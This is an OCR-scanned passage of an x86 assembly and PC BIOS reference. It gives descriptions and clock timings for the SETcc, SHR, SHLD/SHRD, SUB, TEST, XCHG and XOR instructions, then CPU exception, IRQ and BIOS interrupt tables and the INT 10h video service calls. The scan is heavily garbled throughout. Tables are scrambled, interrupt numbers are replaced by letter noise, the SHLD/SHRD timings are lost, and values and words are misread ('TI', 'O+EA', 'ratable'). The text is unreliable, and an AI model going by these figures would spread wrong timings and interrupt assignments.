Sets the byte in the operand to 1 if the Zero Flag is set or the 


Sign Flag is not equal to the Overflow Flag, 


operand to 0. 


% Clocks 

% Operands 808x 286 386 486 
reg8 - - 4 3 
mem8 - - 5 4 


- see —Instruction Timing- 


:setg:setnle 


otherwise sets the 


ASETG/SETNLE - Set if Greater / Set if Not Less or Equal 


A(signed, 386+ only) 


SETG dest 
SETNLE dest 
Modifies flags: none 


Usage: 


Sets the byte in the operand to 1 if the Zero Flag is clear or the 


Sign Flag equals to the Overflow Flag, 


to 0. 

% Clocks 

% Operands 808x 286 386 486 
reg8 - - 4 3 
mem8 - - 5 4 


- see —Instruction Timing- 


Pagina 840 di 991 


otherwise sets the operand 


: sets 
ASETS - Set if Signed (386+ only) 


Usage: SETS dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Sign Flag is set, otherwise 
sets the operand to 0. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see —Instruction Timing- 
:setns 


ASETNS - Set if Not Signed (386+ only) 


Usage: SETNS dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Sign Flag is clear, 
otherwise sets the operand to 0. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see —Instruction Timing- 
:setc 
ASETC - Set if Carry (386+ only) 


Usage: SETC dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Carry Flag is set, 
otherwise sets the operand to 0. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see -Instruction Timing- 


Pagina 841 di 991 


:setnc 
ASETNC - Set if Not Carry (386+ only) 


Usage: SETNC dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Carry Flag is clear, 


otherwise sets the operand to 0. 


% Clocks 

% Operands 808x 286 386 
reg8 - E 4 
mem8 - - 5 


- see —Instruction Timing- 
:seto 


ASETO - Set if Overflow (386+ only) 


Usage: SETO dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Overflow Flag is set, 


486 


3 
4 


otherwise sets the operand to 0. 


% Clocks 

% Operands 808x 286 386 
reg8 - È 4 
mem8 - - 5 


- see —Instruction Timing- 


:setno 


486 


3 
4 


ASETNO - Set if Not Overflow (386+ only) 


Usage: SETNO dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Overflow Flag is clear, 


otherwise sets the operand to 0. 


% Clocks 

% Operands 808x 286 386 
reg8 - - 4 
mem8 - - 5 


- see —-Instruction Timing- 
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486 


3 
4 


:setp:setpe 
ASETP/SETPE - Set if Parity / Set if Parity Even (386+ only) 


Usage: SETP dest 
SETPE dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Parity Flag is set, 
otherwise sets the operand to 0. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see —Instruction Timing- 


:setnp:setpo 
ASETNP/SETPO - Set if No Parity / Set if Parity Odd (386+ only) 


Usage: SETNP dest 
SETPO dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Parity Flag is clear, 
otherwise sets the operand to 0. 


% Clocks size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see —Instruction Timing- 
:sgdt 
ASGDT - Store Global Descriptor Table (286+ privileged) 


Usage: SGDT dest 
Modifies flags: none 


Stores the Global Descriptor Table (-GDT-) Register into the 
specified operand. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
mem64 - 11 9 10 5 


- see —Instruction Timing- 
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:sidt 
ASIDT - Store Interrupt Descriptor Table (286+ privileged) 


Usage: SIDT dest 
Modifies flags: none 


Stores the Interrupt Descriptor Table (IDT) Register into the 
specified operand. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
mem64 - 12 9 10 5 


- see —Instruction Timing- 


: shr 
ASHR - Shift Logical Right 


Usage: SHR  dest,count 
Modifies flags: CF OF PF SF ZF (AF undefined) 


Shifts the destination right by "count" bits with zeroes shifted 
in on the left. The Carry Flag contains the last bit shifted out. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg, 1 2 2 3 2 
mem, 1 15+EA 7 7 2-4 (W88=23+EA) 
reg, CL 8+4n  5+n 3 2 
mem, CL 20+EA+4n 8+n 7 2-4 (W88=28+EA+4n) 
reg, immed8 - 5+n 3 3 
mem, immed8 - 8+n 7 3-5 


- see -Instruction Timing- 


:shld:shrd 
ASHLD/SHRD - Double Precision Shift (386+ only) 


Usage: SHLD dest,src,count 
SHRD dest, src, count 
Modifies flags: CF PF SF ZF (0F,AF undefined) 


SHLD shifts "dest" to the left "count" times and the bit positions 
opened are filled with the most significant bits of "src". SHRD 
shifts "dest" to the right "count" times and the bit positions 
opened are filled with the least significant bits of the second 
operand. Only the 5 lower bits of "count" are used. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 


Pagina 844 di 991 


reg16, reg16, immed8 - - 
reg32, reg32, immed8 - - 
mem16, reg16, immed8 - - 
mem32, reg32, immed8 - - 
reg16, reg16, CL - - 
reg32, reg32, CL - - 
mem16, reg16, CL - - 
mem32, reg32, CL - - 


NINWWWNNWW 
VUI0WWWIDODSNAS 


DASIIWWWWNN 


- see —Instruction Timing- 
:sldt 
ASLDT - Store Local Descriptor Table (286+ privileged) 


Usage: SLDT dest 
Modifies flags: none 


Stores the Local Descriptor Table (LDT) Register into the 
specified operand. 


% Clocks size 

% Operands 808x 286 386 486 Bytes 
reg16 - 2 2 2 3 
mem16 - 2 2 3 5 


- see —Instruction Timing- 


: SMSW 
ASMSW - Store Machine Status Word (286+ privileged) 


Usage: SMSW dest 
Modifies flags: none 


Store Machine Status Word (-MSW-) into "dest". 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16 - 2 10 2 3 
mem16 - 3 3 3 5 


- see —Instruction Timing- 
:stc 


ASTC - Set Carry 


Usage: STC 
Modifies flags: CF 


Sets the Carry Flag to 1. 
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% Clocks Size 
% Operands 808x 286 386 486 Bytes 


none 2 2 2 2 1 


- see -Instruction Timing- 
:std 
ASTD - Set Direction Flag 


Usage: STD 
Modifies flags: DF 


Sets the Direction Flag to 1 causing string instructions to 
auto-decrement SI and DI instead of auto-increment. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 2 2 2 2 1 


- see —Instruction Timing- 
isti 


ASTI - Set Interrupt Flag (Enable Interrupts) 


Usage: STI 
Modifies flags: IF 


Sets the Interrupt Flag to 1, enabling recognition of all CPU 
hardware interrupts. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 2 2 2 5 1 


- see -Instruction Timing- 


:stos:stosb:stosw:stosd 
ASTOS - Store String (Byte, Word or Doubleword) 


Usage: STOS dest 
STOSB 
STOSW 
STOSD 

Modifies flags: None 


Stores value in accumulator to location at ES:(E)DI (even if operand 
is given). (E)DI is incremented/decremented based on the size of 
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the operand (or instruction format) and the state of the Direction 
Flag. Use with -REP- prefixes. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
dest 11 3 4 5 1 (W88=15) 


- see —Instruction Timing- 


:str 
ASTR - Store Task Register (286+ privileged) 


Usage: STR dest 
Modifies flags: None 


Stores the current Task Register to the specified operand. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16 - 2 2 2 3 
mem16 - 3 2 3 5 


- see —Instruction Timing- 


: sub 
ASUB - Subtract 


Usage: SUB dest,src 
Modifies flags: AF CF OF PF SF ZF 


The source is subtracted from the destination and the result is 
stored in the destination. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg 3 2 2 1 2 
mem, reg 16+EA 7 6 3 2-4 (W88=24+EA) 
reg, mem 9+EA 7 7 2 2-4 (W88=13+EA) 
reg, immed 4.3 2 1 3-4 
mem, immed —17+EA 7 7 3 3-6 (W88=25+EA) 
accum, immed 4 3 2 1 2-3 


- see -—Instruction Timing- 


:test 
NTEST - Test For Bit Pattern 


Usage: TEST dest,src 
Modifies flags: CF OF PF SF ZF (AF undefined) 
Performs a logical -AND- of the two operands updating the flags 
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% 
% 


:Verr 
AVERR 


% 
% 


:Verw 
AVERW 


% 
% 


iwalt 


register without saving the result. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg, reg 3 2 1 1 2 
reg, mem O+EA 6 5 1 2-4 (W88=13+EA) 
mem, reg O+EA 6 5 2 2-4 (W88=13+EA) 
reg, immed 5 3 2 1 3-4 
mem, immed 11+EA 6 5 2 3-6 
accum, immed 4 3 2 1 2-3 


- see —Instruction Timing- 


- Verify Read (286+ protected) 


Usage: VERR src 
Modifies flags: ZF 


Verifies the specified segment selector is valid and is readable 
at the current privilege level. If the segment is readable, 
the Zero Flag is set, otherwise it is cleared. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg16 - 14 10 11 3 
mem16 - 16 11 11 5 


- see —Instruction Timing- 


- Verify Write (286+ protected) 


Usage: VERW src 
Modifies flags: ZF 


Verifies the specified segment selector is valid and is ratable 
at the current privilege level. If the segment is writable, 
the Zero Flag is set, otherwise it is cleared. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg16 - 14 15 11 3 
mem16 - 16 16 11 5 


- see -Instruction Timing- 


:fwait 


MIAIT/FWAIT - Event Wait 
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% 
% 


Usage: WAIT 
FWAIT 
Modifies flags: None 


CPU enters wait state until the coprocessor signals it has finished 
it's operation. This instruction is used to prevent the CPU from 
accessing memory that may be temporarily in use by the coprocessor. 
WAIT and FWAIT are identical. 


Clocks size 
Operands 808x 286 386 486 Bytes 
none 4 3 6+ 1-3 1 


- see -Instruction Timing- 


:wbinvd 
AWBINVD - Write-Back and Invalidate Cache 


% 
% 


:xchg 
AXCHG 


% 
% 


:ixlat: 


Usage: WBINVD 
Modifies flags: None 


Flushes internal cache, then signals the external cache to write 
back current data followed by a signal to flush the external cache. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
none - - - 5 2 


- see —Instruction Timing- 


- Exchange 


Usage: XCHG dest,src 
Modifies flags: None 


Exchanges contents of source and destination. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg, reg 4 3 3 3 2 
mem, reg 17+EA 5 5 5 2-4 (W88=25+EA) 
reg, mem 17+EA 5 5 3 2-4 (W88=25+EA) 
accum, reg 3 3 3 3 1 
reg, accum 3 3 3 3 1 


- see —Instruction Timing- 


xlatb 
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AXLAT/XLATB - Translate 


Usage: XLAT translation-table 
XLATB (masm 5.x) 
Modifies flags: None 


Replaces the byte in AL with byte from a user table addressed by 
BX. The original value of AL is the index into the translate table. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
table 11 5 5 4 1 


- see -Instruction Timing- 


1 XOr 
AXOR - Exclusive OR 


Usage: XOR  dest,src 
Modifies flags: CF OF PF SF ZF (AF undefined) 


Performs a bitwise exclusive OR of the operands and returns 
the result in the destination. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg 3 2 2 1 2 
mem, reg 16+EA 7 6 3 2-4 (W88=24+EA) 
reg, mem 9+EA 7 7 2 2-4 (W88=13+EA) 
reg, immed 4.3 2 1 3-4 
mem, immed —17+EA 7 7 3 3-6 (W88=25+EA) 
accum, immed 4 3 2 1 2-3 


- see -Instruction Timing- 
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@Interrupt Services DOSÙBIOSÙEMSÙMouse 
‘int table:interrupt table:exceptions:IRQ 
NAIntel Defined CPU Exception Table (see notes) 


% Interrupt 


O DTM V0IPIOONDQUIUDSDWWNEFEFO 


po 


Function 


Divide by zero 

Single step 

Non-maskable (NMI) 

Breakpoint 

Overflow trap 

BOUND range exceeded (186,286,386) 
Invalid opcode (186, 286,386) 
Coprocessor not available (286,386) 
Double fault exception (286,386) 
Coprocessor segment overrun (286,386) 
Invalid task state segment (286,386) 
Segment not present (286,386) 

Stack exception (286,386) 

General protection exception (286,386) 
Page fault (286,386) 

Reserved 

Coprocessor error (286,386) 


NAIBM PC Hardware Interrupt Table (in order of priority) 


% IRQ# 


IRQ0 
IRQ1 
IRQ2 
IRQ8 
IRQ9 
IRQ10 
IRQ11 
IRQ12 
IRQ13 
IRQ14 
IRQ15 
IRQ3 
IRQ4 
IRQ5 
IRQ6 
IRQ7 


Interrupt Function 


8 
9 
A 
70 
71 
72 
73 
74 
75 
76 
TI 
B 
Cc 
D 
E 
F 


-timer- (55ms intervals, 18.2 per second) 
keyboard service required 

slave -8259- or EGA/VGA vertical retrace 

real time clock (AT,XT286,PS50+) 

software redirected to IRQ2 (AT,XT286,PS50+) 
reserved (AT,XT286,PS50+) 

reserved (AT,XT286,PS50+) 

mouse interrupt (PS50+) 

numeric coprocessor error (AT,XT286,PS50+) 
fixed disk controller (AT,XT286,PS50+) 

reserved (AT,XT286,PS50+) 

COM2 or COM4 service required, (COM3-COM8 on MCA PS/2) 
COM1 or COM3 service required 

fixed disk or data request from LPT2 

floppy disk service required 

data request from LPT1 (unreliable on IBM mono) 


AInterrupt Table as Implemented by System BIOS/DOS 


% INT # 


OF PIOONDQUIISLWNE-EO 
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CPU 
CPU 
CPU 
CPU 
CPU 
BIOS 
CPU 
CPU 
IRQ0 
IRQ1 
IRQ2 
IRQ3 
IRQ4 


Locus Function 


divide by zero 

single step 

non-maskable 

breakpoint 

overflow trap 

print screen 

Invalid opcode (186, 286,386) 

coprocessor not available (286,386) 
-timer- (55ms intervals, 18.21590 per second) 
keyboard service required (see -INT 9-) 
slave -8259- or EGA/VGA vertical retrace 
COM2 service required (PS/2 MCA C0M3-COM8) 
COM1 service required 
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fixed disk or data request from LPT2 

floppy disk service required 

data request from LPT1 (unreliable on IBM mono) 
video (see -INT 10-) 

Equipment determination (see -INT 11-) 

memory size (see -INT 12-) 

disk I/0 service (see -INT 13-) 

serial communications (see -INT 14-) 

system services, cassette (see -INT 15-) 
keyboard services (see -INT 16-) 

parallel printer (see -INT 17-) 

ROM BASIC loader 

bootstrap loader (unreliable, see -INT 19-) 
time of day (see -INT 1A-) 

user defined ctrl-break handler (see -INT 1B-) 
user defined clock tick handler (see -INT 1C-) 
-6845- video parameter pointer 

diskette parameter pointer (base table) 
graphics character table 

general program termination 

function request services (see -INT 21-) 
terminate address (see -INT 22-) 

control break termination address (see -INT 23-) 
critical error handler (see -INT 24-) 

absolute disk read (see -INT 25-) 

absolute disk write (see -INT 26-) 

terminate and stay resident (see -INT 27-) 

idle loop, issued by DOS when idle (see -INT 28-) 
fast TTY console I/0 (see -INT 29-) 

critical section and NETBIOS (see -INT 2A-) 
internal, simple -IRET- in DOS 2.0-5.0 
internal, simple IRET in DOS 2.0-5.0 

internal, simple IRET in DOS 2.0-5.0 

exec command from base level command 
interpreter (see -INT 2E-) 

multiplexer (see -INT 2F-) 

far jump vector for CPM (not an interrupt) 

DOS Protected Mode Interface (for DOS extenders) 
reserved 

mouse support (see —INT 33-) 

Microsoft/Borland floating point emulation 
overlay manager 

hard disk 

fixed disk 0 parameters pointer (see -INT 13,9-) 
relocated video handler (EGA/VGA/PS) 

user font table (EGA/VGA/PS) 

first 128 graphics characters (also Netware) 
reserved for BIOS 

fixed disk 1 parameters ptr (see -INT 13,9-/INT 41) 
reserved for BIOS 

PCjr cordless keyboard translation 

PCjr non-keyboard scancode translation table 
user alarm (AT,CONV,PS/2) (see -INT 4A-) 
reserved 

periodic alarm from timer (PS/2) 

reserved 

GSS Computer Graphics Interface 

cluster adapter BIOS entry point 

cluster adapter boot 


NETBIOS NETBIOS interface, TOPS interface 


BIOS 


EMS 


reserved for BIOS 
reserved for user software interrupts 
LIM/EMS specification (see -INT 67-) 


68 APPC 
69-6B reserved by IBM 
6C DOS DOS 3.2 real time clock update 
BIOS system resume vector 
6D-6F reserved 
70 IRQ8 real time clock (AT,XT286,PS50+, see -INT 15-) 
71 IRQ9 software redirected to IRQ2 (AT,XT286,PS50+) 
72 IRQ10 reserved (AT,XT286,PS50+) 
73 IRQ11 reserved (AT,XT286,PS50+) 
74 IRQ12 mouse interrupt (PS50+) 
75 IRQ13 numeric coprocessor NMI error (AT,XT286,PS50+) 
76 IRQ14 fixed disk controller (AT,XT286,PS50+) 
TI IRQ15 reserved (AT,XT286,PS50+) 


78-79 unused 

80-85 ROM BASIC 

86-FO DOS reserved for BASIC interpreter use 

86 NETBIOS NETBIOS relocated INT 18 

EO CPM_CP/M 86 function calls 

F1-FF reserved by IBM 

FE-FF may be destroyed by return from protected 


mode using VDISK on 286 machines (Apr 86, DDJ) 


- Intel defined 0 through 20h for use for internal CPU; IBM 
redefined interrupts 0 through 1Fh for its own use, hence 
the duplicate definitions in the tables 

- all interrupts except the internal CPU exceptions push the 
flags and the CS:IP of the next instruction onto the stack. 
CPU exception interrupts are similar but push the CS:IP of the 
causal instruction. 8086/88 divide exceptions are different, 
they return to the instruction following the division 

- interrupts are disabled upon entry into any interrupt routine and 
should be enabled by the user or by an -IRET- 

- in DOS 3.2+ hardware IRQ interrupts are re-vectored through DOS 
to provide standard stack frames 


sint 5 
NINT 5 - Print Screen 


no input data 


% related memory: 


50:00 


00 Print screen has not been called, or upon return 
from a call there were no errors 

01 Print screen is already in progress 

FF Error encountered during printing 


- invoked from -INT 9- 


‘int 8:BIOS timer interrupt 
AINT 8 - System timer 


no input data 
% related memory: 
40:6C 


40:70 
40:67 


Daily timer counter (4 bytes) 
24 hr overflow flag (1 byte) 
Day counter on all products after AT 
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4 


sint 9: 
AINT 9 


n 


% r 


F 


% r 


sint 10 
AINT 10 


% F 
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0:40 = Motor shutoff counter - decremented until 0 then 
shuts off diskette motor 


-INT 1C- is invoked as a user interrupt 

the byte at 40:70 is a flag that certain DOS functions use 

and adjust the date if necessary. Since this is a flag and 

not a counter it results in DOS (not the -RTC-) losing days 

when several midnights pass before a DOS call 

generated 18.2 times per second by the -8253- Programmable Interval 
Timer (PIT) 

normal INT 8 execution takes approximately 100 microseconds 


see -8253- 


keyboard interrupt 
- Keyboard Interrupt (Hardware Handler) 


o input data 


elated memory: 


0:17 = updates keyboard flag byte 0 

0:18 = updates keyboard flag byte 1 

0:1A = queue head ptr is set to buffer start if Ctrl-Break is hit 

0:1C = updates buffer tail pointer for each keystroke; sets 
queue tail ptr is set to queue start if Ctrl-Break is hit 

0:1E = updates keyboard buffer (32 bytes) 

0:71 = updates bit 7 of the BIOS break flag if Ctrl-Break is hit 

0:72 = updates reset flag with 1234H if Ctrl-Alt-Del pressed 

0:96 = indicates keyboard type (AT,PS/2) 

0:97 = updates keyboard LED flags (AT,PS/2) 

FFF:0 = reboot code called if Ctrl-Alt-Del pressed 

elated interrupts: 

INT 5- invoked if print screen key pressed 

INT 1B- invoked if Ctrl-Break key sequence pressed 


INT 15,85- invoked on AT if system request key is pressed 
INT 15,4F- invoked on machines after PC/AT with AL = scan code 


records key press and key release via IRQ1/8259 and 

stores scan codes in the BIOS buffer located at 40:1C 
keyboard controllers also buffer data when interrupts are 
disabled at the -8259- interrupt controller 

keyboard controller is capable of storing 16 keystrokes 
even when interrupts are disabled at the 8259 

normal INT 9 execution takes approximately 500 microseconds; 
at least one standard XT BIOS is known to take up to 1.3 
milliseconds to execute 


see -MAKE CODES- -KB FLAGS- 


:BIOS video services:video interrupt 
- Video BIOS Services 


or more information, see the following topics: 
-INT 10,0- - Set video mode 

-INT 10,1- - Set cursor type 

-INT 10,2- - Set cursor position 

-INT 10,3- - Read cursor position 
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-INT 10,4- - Read light pen 

-INT 10,5- - Select active display page 
-INT 10,6- - Scroll active page up 

-INT 10,7- - Scroll active page down 


-INT 10,8- - Read character and attribute at cursor 
-INT 10,9- - Write character and attribute at cursor 
-INT 10,A- - Write character at current cursor 


-INT 10,B- - Set color palette 

-INT 10,C- - Write graphics pixel at coordinate 

-INT 10,D- - Read graphics pixel at coordinate 

-INT 10,E- - Write text in teletype mode 

-INT 10,F- - Get current video state 

-INT 10,10- - Set/get palette registers (EGA/VGA) 

-INT 10,11- - Character generator routine (EGA/VGA) 

-INT 10,12- - Video subsystem configuration (EGA/VGA) 

-INT 10,13- - Write string (BIOS after 1/10/86) 

-INT 10,14- - Load LCD char font (convertible) 

-INT 10,15- - Return physical display parms (convertible) 

-INT 10, 1A- - Video Display Combination (VGA) 

-INT 10, 1B- - Video BIOS Functionality/State Information (MCGA/VGA) 
-INT 10, 1C- - Save/Restore Video State (VGA only) 

-INT 10,FE- - Get DESQView/TopView Virtual Screen Regen Buffer 
-INT 10,FF- - Update DESQVIiew/TopVview Virtual Screen Regen Buffer 


Warning: Some BIOS implementations have a bug that causes register 
BP to be destroyed. It is advisable to save BP before a call to 
Video BIOS routines on these systems. 


- registers CS, DS, ES, SS, BX, CX, DX are preserved unless 
explicitly changed 
- see -—INT 1F- -INT 1D- -INT 29- -INT 21,2- -INT 21,6- -INT 21,9- 


:int 10,0:video modes 
AINT 10,0 - Set Video Mode 


AH 

AL = 00 40x25 B/W text (CGA, EGA, MCGA, VGA) 

01 40x25 16 color text (CGA,EGA, MCGA, VGA) 

02 80x25 16 shades of gray text (CGA,EGA,MCGA, VGA) 

03 80x25 16 color text (CGA,EGA, MCGA, VGA) 

04 320x200 4 color graphics (CGA, EGA, MCGA, VGA) 

05 320x200 4 color graphics (CGA, EGA, MCGA, VGA) 

06 640x200 B/W graphics (CGA, EGA, MCGA, VGA) 

07 80x25 Monochrome text (MDA, HERC, EGA, VGA) 

08. 160x200 16 color graphics (PCjr) 

09 320x200 16 color graphics (PCjr) 

0A 640x200 4 color graphics (PCjr) 

OB Reserved (EGA BIOS function 11) 

OC Reserved (EGA BIOS function 11) 

OD 320x200 16 color graphics (EGA,VGA) 

OE 640x200 16 color graphics (EGA,VGA) 

OF. 640x350 Monochrome graphics (EGA, VGA) 

10 640x350 16 color graphics (EGA or VGA with 128K) 
640x350 4 color graphics (64K EGA) 

11 640x480 B/W graphics (MCGA, VGA) 

12 640x480 16 color graphics (VGA) 

320x200 256 color graphics (MCGA,VGA) 

8x EGA, MCGA or VGA ignore bit 7, see below 

9x EGA, MCGA or VGA ignore bit 7, see below 


HH HH NI 
pH 
W 


- if AL bit 7=1, prevents EGA,MCGA & VGA from clearing display 
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- function updates byte at 40:49; bit 7 of byte 40:87 
(EGA/VGA Display Data Area) is set to the value of AL bit 7 


:int 10,1 
NINT 10,1 - Set Cursor Type 


AH = 01 
CH = cursor starting scan line (cursor top) (low order 5 bits) 
CL = cursor ending scan line (cursor bottom) (low order 5 bits) 


returns nothing 


- cursor scan lines are zero based 

- cursor size can also be set via the -6845- CRT controller 

- cursor size can be determined using the CRTC, -INT 10,3- or the 
-BIOS Data Area- bytes 40:60 (ending scan line) and 40:61 (starting 
scan line) 

- the following is a list of the cursor scan lines associated with 
most common adapters; screen sizes over 40 lines may differ 
depending on adapters. 


% Line Starting Ending Character 
% Video Count Scan Line Scan Line Point Size 

CGA 25 06 07 08 

MDA 25 OB OC OE 

EGA 25 06 07 OE 

EGA 43 04/06 07 08 

VGA 25 OD OE 10 

VGA 40 08 09 0A 

VGA 50 06 07 08 


- use CX = 2000h to disable cursor 


:int 10,2 
NINT 10,2 - Set Cursor Position 


AH = 02 

BH = page number (0 for graphics modes) 
DH = row 

DL = column 


returns nothing 


- positions relative to 0,0 origin 

- 80x25 uses coordinates 0,0 to 24,79; 40x25 uses 0,0 to 24,39 

- the -6845- can also be used to perform this function 

- setting the data in the BIOS Data Area at location 40:50 does not 
take immediate effect and is not recommended 

- see —VIDEO PAGES-  —-6845- —BDA- 


:int 10,3 


NAINT 10,3 - Read Cursor Position and Size 


AH 
BH 


03 
video page 
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on return: 


CH = cursor starting scan line (low order 5 bits) 
CL = cursor ending scan line (low order 5 bits) 
DH = row 

DL = column 


- returns data from -BIOS DATA AREA- locations 40:50, 40:60 and 40:61 

- the -6845- can also be used to read the cursor position 

- the return data can be circumvented by direct port 1/0 to the 6845 
CRT Controller since this function returns the data found in the 
BIOS Data Area without actually checking the controller 


:int 10,4 
NAINT 10,4 - Read Light Pen Position 


AH = 04 
on return: 
AH = 0 light pen switch not triggered 
= 1 light pen triggered 
BX = pixel column (0-319 or 0-639, mode dependent) 
CH = raster line (0-199) (CGA and EGA modes 4, 5 and 6) 
CX = raster line (EGA modes except 4, 5 and 6) 
DH = row (0-24) 
DL = column (0-79 or 0-79 mode dependent) 


- data returned as a byte coordinate, leaving horizontal 
accuracy to within 2 pixels (320) or 4 pixels (640) 

- vertical accuracy within 2 lines 

- PS/2's don't support the light pen interface 


:int 10,5 
AINT 10,5 - Select Active Display Page 
AH = 05 
AL = new page number, see -VIDEO PAGES- 


for PCjr only: 
AL = 80h to read CRT/CPU page registers 
81h to set CPU page register 
BL = CPU page register 
82h to set CRT page register 
BH = CRT page register 
83h to set CPU and page registers 
CRT page register 
CPU page register 


on return: (PCjr only) 


BH = CRT page register 
BL = CPU page register 
:int 10,6 


AINT 10,6 - Scroll Window Up 
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AL = number of lines to scroll, previous lines are 
blanked, if © or AL > screen size, window is blanked 


BH = attribute to be used on blank line 

CH = row of upper left corner of scroll window 

CL = column of upper left corner of scroll window 
DH = row of lower right corner of scroll window 

DL = column of lower right corner of scroll window 


returns nothing 


- in video mode 4 (300x200 4 color) on the EGA, MCGA and VGA 
this function scrolls page 0 regardless of the current page 
- can be used to scroll graphics screens, using character coords 
- on CGA's this function disables video adapter, causing flitter 
:int 10,7 
AINT 10,7 - Scroll Window Down 


AH = 07 

AL = number of lines to scroll, previous lines are 
blanked, if © or AL > screen size, window is blanked 

BH = attribute to be used on blank line 

CH = row of upper left corner of scroll window 

CL = column of upper left corner of scroll window 

DH = row of lower right corner of scroll window 

DL = column of lower right corner of scroll window 


returns nothing 


- in video mode 4 (300x200 4 color) on the EGA, MCGA and VGA 
this function scrolls page 0 regardless of the current page 

- can be used to scroll graphics screens, using character coords 

- on CGA's this function disables video adapter, causing flitter 


:int 10,8 
AINT 10,8 - Read Character and Attribute at Cursor Position 


AH = 08 

BH = display page 

on return: 

AH = attribute of character (alpha modes only) 
AL = character at cursor position 


- in video mode 4 (300x200 4 color) on the EGA, MCGA and VGA 
this function works only on page zero 


:int 10,9 
AINT 10,9 - Write Character and Attribute at Cursor Position 


AH = 09 

AL = ASCII character to write 

BH = display page (or mode 13h, background pixel value) 

BL = character attribute (text) foreground color (graphics) 
CX = count of characters to write (CX >= 1) 
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returns nothing 


- does not move the cursor 
- in graphics mode (except mode 13h), if BL bit 7=1 then 
value of BL is xo0R'ed with the background color 


:int 10,a 
AINT 10,A - Write Character Only at Current Cursor Position 


AH = 0A 

AL = ASCII character to write 

BH = display page (or mode 13h, background pixel value) 
BL = foreground color (graphics mode only) 

CX = count of characters to write (CX >= 1) 


return nothing 


- similar to -INT 10,9- except color ignored in text modes 


:int 10,b 
NINT 10,B - Set Color Palette 
AH = OB 
BH = palette color ID 
= 0 to set background and border color 
= 1 to select 4 color palette 
BL = color value (when BH = 0) 


palette value (when BH = 1) 


Palette Pixel Color 
(0) current background color 
green (2) 
red (4) 
brown (6) 
current background color 
cyan (3) 
magenta (5) 
white (7) 


[ar 
WN-PLPOoOWN-FrFreo 


- does not work for all EGA and VGA video modes 
- sets border color in text mode (BH = 0) 


sint 10,c 
NAINT 10,C - Write Graphics Pixel at Coordinate 


AH = 0C 

AL = color value (xOR'ED with current pixel if bit 7=1) 
BH = page number, see —VIDEO PAGES- 

CX = column number (zero based) 

DX = row number (zero based) 


returns nothing 


- if bit 7 is 1, color specified is x0R'ed with current pixel 
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- page number in BH ignored for 320x200 4 color graphics mode 
- this function is known to destroy AX and possibly SI and DI on 
on some PS/2 VGA systems 


:int 10,d 
AINT 10,D - Read Graphics Pixel at Coordinate 


AH = OD 

BH = page number, see —VIDEO PAGES- 
CX = column number (zero based) 

DX = row number (zero based) 

on return: 


AL = color of pixel read 


- 64K IBM EGAs with BIOS dated 9/13/84 in 350 line video 
modes, return invalid data in AL 
- page number in BH ignored for 320x200 4 color graphics mode 


:int 10,e 
AINT 10,E - Write Text in Teletype Mode 


AH = 0E 

AL = ASCII character to write 

BH = page number (text modes) 

BL = foreground pixel color (graphics modes) 


returns nothing 


- cursor advances after write 

- characters BEL (7), BS (8), LF (A), and CR (D) are 
treated as control codes 

- for some older BIOS (10/19/81), the BH register must point 
to the currently displayed page 

- on CGA adapters this function can disable the video signal while 
performing the output which causes flitter. 


:int 10,f 
NAINT 10,F - Get Video State 


AH = 0F 
on return: 
AH number of screen columns 


AL = mode currently set (see —-VIDEO MODES-) 
= current display page 


- video modes greater than 13h on EGA, MCGA and VGA indicate 
-INT 10,0- was called with the high bit of the mode (AL) set 
to 1, meaning the display does not need cleared 

- function returns byte value at 40:49; On EGA, MCGA and 
VGA bit 7 of register AL is determined by bit 7 of BIOS Data 
Area byte 40:87. This bit is usually set by INT 10,0 
with bit 7 of the requested mode (in AL) set to 1 
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:int 10,10 
AINT 10,10 - Set/Get Palette Registers (EGA/VGA) 


% 


% 


% 


% 


% 


% 


% 


% 


% 


% 


AH = 10h 


AL = 00 set individual palette register 
color value 
palette register 


AL = 01 set border color (overscan register) 
BH = color value 


AL = 02 set all palette registers and border 
ES:DX = pointer to 17 byte table representing 16 palette 
registers and border color register 


AL = 03. toggle intensity/blinking (EGA) 
BL = © enable intensity 
1 enable blinking 


AL = 07 read palette register (PS/2) 
BL = palette register to read (0-15) 
on return: 
BH = value of palette register 
AL = 08 read border color (overscan register, PS/2) 
on return: 


BH = value of border color (overscan register) 


AL = 09 read palette registers and border (PS/2) 
ES:DX = pointer to 17 byte table representing 16 palette 
registers and border color register 


on return: 
ES:DX = pointer to table provided as input 


AL = 10 set DAC color register 
BX = color register to set 
CH = green value 
CL = blue value 
DH = red value 
AL 12 set block of DAC color registers 


first color register to set 
number of color registers to set 
:DX = pointer to table of color values to set 


AL = 13 set attribute controller color select state 
BL = 0 set Mode Control register bit 7 
